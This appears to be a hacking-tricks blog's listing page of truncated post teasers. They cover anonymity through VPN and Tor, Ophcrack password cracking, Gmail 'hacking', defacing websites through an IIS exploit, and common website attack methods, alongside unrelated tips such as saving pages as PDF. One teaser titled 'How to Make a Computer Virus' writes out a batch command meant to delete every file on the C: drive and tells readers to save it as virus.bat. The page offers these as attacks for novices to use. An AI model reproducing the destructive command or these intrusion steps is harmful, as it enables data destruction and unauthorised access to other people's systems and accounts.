Anonymous hacking using VPN and TOR

This video covers how hackers use VPN and Tor to hide their identity and test the security of websites and portals. VPN : “A virtual private network (VPN) extends a private network across a public network, such as the Internet.…
How to Make a Computer Virus

>>>Virus that format C: Drive:  1. Open Notepad and copy below code into it. @Echo off Del C: *.* |y    2. Save this file as virus.bat (Name can be anything but .bat is must)    3. Now, running this…
How to save a webpage as PDF

Steps :     1. Open the Google Chrome Browser on your PC or MAC  2. Then go to the web page that you want to convert as a PDF.  3. Now press Ctrl+P on Windows PC or Command+P if…
Hack Windows 7 Password Using Ophcrack

Opcrack is an open source windows password cracker based on rainbow tables. It comes with Graphical user interface(GUI) and runs on multiple platform such windows, linux and mac.  It allows you to recover or hack windows password. 1>Download OPhcrack by…
Download whatsApp for Windows

To use the Android version of WhatsApp, either you need an Android phone or a well running Android emulator or SDK. There are so many emulators around, but I find BlueStacks App Player a real treat. It is now available…
Gmail Hacking Ebook ,Hack Gmail accounts

The first book to unlock the true power behind Gmail, Hacking Gmail will immediately appeal to Google and Gmail fans This is serious, down-and-dirty, under-the-hood, code-level hacking that will have readers eliminating the default settings, customizing appearance, disabling advertising, and…
Hack Website with IIS Exploit

Read Our first post about website hacking http://newhackingtricks.com/2014/02/how-to-hack-website.html With IIS Exploit we can upload the Defaced page on the Vulnerable Server without any Login. It is most Easiest way to Hack any site.STEP 1: Click on Start button and open…
How to Hack a website

First find a Vulnerable Website? Common Methods used for Website HackingThere are lots of methods that can be used to hack a website but most common ones are as follows:1.SQL Injection2.XSS(Cross Site Scripting)3.Remote File Inclusion(RFI)4.Directory Traversal attack5.Local File inclusion(LFI)6.DDOS attack…